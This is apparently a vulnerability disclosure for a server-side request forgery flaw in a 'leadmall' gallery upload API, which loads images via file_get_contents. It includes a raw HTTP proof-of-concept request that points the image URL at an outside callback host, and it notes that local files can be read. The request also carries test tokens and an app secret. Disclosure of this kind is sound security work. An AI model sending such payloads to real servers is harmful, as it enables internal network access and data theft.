Description

Upload image to gallery, the server use file_get_contents function to load image via data scheme url, so attacker can modify this url to any URL like http to send ability request to any URL , and file to read local file, ...

Proof of Concept

POST /index.php?q=/api/leadmall/gallery HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9sb2NhbGhvc3QiLCJhdWQiOiJodHRwOlwvXC9sb2NhbGhvc3QiLCJqdGkiOiI5OGMwOGMyNWY4MTM2ZDU5MGMiLCJpYXQiOjE2NTM1ODIzNjIsImV4cCI6MTY1NjE3NDM2MiwiaWQiOjF9.leK1uig5bqE77ZcsCd6kaNpaMwz7SkPjuq38eHrytj8
QM-APP-TYPE: undefined
QM-APP-ID: 98c08c25f8136d590c
QM-APP-SECRET: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Content-Length: 162
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?r=admin%2Findex
Cookie: _csrf=6173ae085358868d37d1217a51c7fa0d0f4e8f4ff1bc5c02ee4821b0ef541f40a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ldQlSO9tUQ9FAJbS1H3lDUd-3qdmZFnP%22%3B%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-PwnFox-Color: blue

{"type":1,"group_id":-1,"content":"http://ysuel0pxqg3wvmaizyvshw83ouuki9.burpcollaborator.net/ssrf","title":"280864382_542263584214444_7204343006064197991_n.jpg"}

Image PoC

Impact

A successful SSRF attack can often result in unauthorized actions or access to data within the organization.